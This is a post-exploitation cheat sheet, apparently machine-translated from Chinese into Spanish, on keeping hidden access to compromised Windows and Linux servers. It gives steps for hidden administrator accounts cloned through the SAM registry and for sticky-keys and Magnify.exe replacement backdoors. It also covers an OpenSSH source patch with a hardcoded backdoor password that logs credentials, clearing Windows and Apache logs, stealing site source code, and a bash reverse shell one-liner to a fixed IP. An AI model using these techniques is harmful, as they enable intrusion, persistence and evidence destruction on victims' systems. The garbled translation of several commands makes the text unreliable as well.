Seguridad de la red (penetración Trece)

ventanas

1. Las cuentas de usuario puerta de atrás
   NET el usuario
   NET del AA de usuario / Add
   NET LOCALGROUP del Administradores A / Add
   Mi PC - Gestión - grupos de usuarios locales, haga clic con el usuario creado después de establecer una contraseña
   para abrir el Registro regedit, seleccione SAM, todo el mundo permiso para agregar un control completo
   mirando el nombre de un administrador, y los nombres de los tipos correspondientes 0x1F4,
   y luego encontrar el valor binario del administrador, seleccione todas las copias
   de la misma operación, encontrar el creado por el usuario, el administrador del valor binario unido a crear su propia
   Finalmente, el conjunto de todo el mundo permiso para borrar

   ---

   net user guest / active: yes
   invitados usuario de la red 123.com
   net localgroup administradores de invitados / add

   ---

   Ocultar cuenta:
   movimiento Support_388945a0 el usuario
   del ordenador - Gestión - usuario - contraseña Support_388945a0
   clic derecho Propiedades - Dial - Permite el acceso remoto

   Manejo - - Mi PC usuarios locales grupo, creado después de la contraseña del usuario haga clic derecho
   para abrir el Registro regedit, seleccione SAM, todo el mundo permiso para agregar un control completo
   para encontrar el nombre del administrador, así como los nombres de los tipos correspondientes 0x1F4,
   para encontrar administrador valor binario, el nombre de la tabla f Seleccionar todo para copiar
   la misma operación, encontrar Support_388945a0, el administrador del valor binario unido a Support_388945a0
   por último, cada uno de borrar la configuración de permisos

   Mi ordenador - Propiedades - abrir el escritorio remoto

2. puerta de atrás LPK
   después de crear un usuario
   utilizando la LPK generar un archivo lpk.dll
   continuación, los archivos system32 lpk.dll al servidor de destino entre
   el objetivo de 3389 en la página de conexión, pulse cinco veces para que aparezca la tecla de mayúsculas adhesiva
   y luego presione el botón para establecer una buena, introducir la contraseña para iniciar el programa

3. troyano de puerta trasera
   era del sueño

Claros signos - Informática - Manejo de
Visor de sucesos - Seguridad - derecha haga clic en Borrar Todos los Eventos

Administrador de IIS - Acceso a Propiedades del sitio Web - Registro de Propiedades
Propiedades de registro de archivos - Mi PC para abrir, en comparación con quitar el acceso a los registros

Linux

1. Puerta trasera
   dos herramientas para descomprimir después de cargado
   de alquitrán zxvf OpenSSH 5.9p 1.tar.gz-
   tar zxvf 0x06-5.9p OpenSSH 1.patch.tar.gz-
   cd-5.9p1.path OpenSSH /
   cp sshbd5.9p1.diff ... / OpenSSH-5.9p1
   CD ... / 5.9p1 openSSH-
   Patch <ruta de puerta trasera // sshbd5.9p1.diff

   vi includes.h // Modificar puerta trasera contraseña, archivo de registro de localización
   / *
   + # Definir ILOG "/ tmp / ILOG /" // conectarse a la máquina registra el nombre de usuario y contraseña
   + # define Olog "/ tmp / olog" // Registro Iniciar sesión en el nombre de usuario y la contraseña remota
   + # define SECRETPW "123456" // puerta trasera contraseña
   * /

   yum install -y OpenSSL openssl-devel pam-devel
   ./configure --prefix = / usr --sysconfdir = / etc / ssh --with-pam---con kerberos5

   // Si tiene problemas para instalar zlib
   // yum -y instalar zlib zlib -devel

   el make install && make del
   Servicio // reiniciar sshd restart sshd
   SSH aterrizaje

Claro traza
var / log / httpd / access_log
etc / httpd / Loga / access_log

直接修改文件，将ip 访问的网站全部改掉
vim var/log/httpd/access_log

---

paquete fuente

asp 源码打包生成HSH.mdb
在木马的同一级目录下访问HSH.mdb，进行下载
在本地访问用于打包的马进行解包

php源码打包  nosafe.php马 在根目录下最下方有全选
然后选择压缩

Tuoku:
Gestión de Datos - off Cooma

---

Rebote shell.

echo “fiesta de -i> & /dev/tcp/192.168.31.237/4444 0> & 1” | golpetazo

golpe -i: Bash es un común shell Linux, parámetro -i indica generar un shell interactivo

/dev/tcp/192.168.175.134/8080: / dev / tcp | UDP / IP / puerto es un Linux especial en un archivo, si el acceso en Linux se encuentra este archivo no existe, su significado es anfitrión y establecer un objetivo tcp ip host o la conexión de puerto UDP en el puerto

0> & 1: 0 entrada estándar a la salida estándar 1 redirección de la salida. O puede entenderse, la entrada estándar y salida estándar 0 1 combinado, para redirigir 1, porque 1 ya ha sido redirigido a la /dev/tcp/192.168.175.134/8080 salida estándar, por lo que ahora la entrada estándar y salida estándar 0 1 punto /dev/tcp/192.168.175.134/8080.
eco + | golpe es el conducto intermedio que tiene un shell interactivo por bash impartir

---

puerta trasera turno
será C: \ WINDOWS \ system32 \ dllcache \ sethc.exe borrar esta carpeta coloca la caché, si no se eliminan automáticamente cambie de nuevo.

Eliminar el archivo C: \ sethc.exe WINDOWS \ system32 \ bajo.

Cambiar el nombre de la carpeta C: \ cmd.exe WINDOWS \ system32 \ bajo es sethc.exe.

Presione la ventana de DOS 5 a aparecer los privilegios administrativos siguiente turno.

---

Ampliación de la puerta trasera de cristal

La creación de magnify.bat

@ echo off
net user administrador woaijiushi $ / add
net localgroup administradores piratear $ / add
% windir% \ system32 \ nagnify.exe
salida

Bat2com utilizando otras herramientas para convertir el archivo en archivo EXE Bat
Magnify.exe generada podrán sustituir a C: \ WINDOWS \ system32 \ Magnify.exe C y bajo Dllcache: \ WINDOWS \ system32 Magnify.exe en \

Llamando al + T combinación de teclas Win aterrizaje.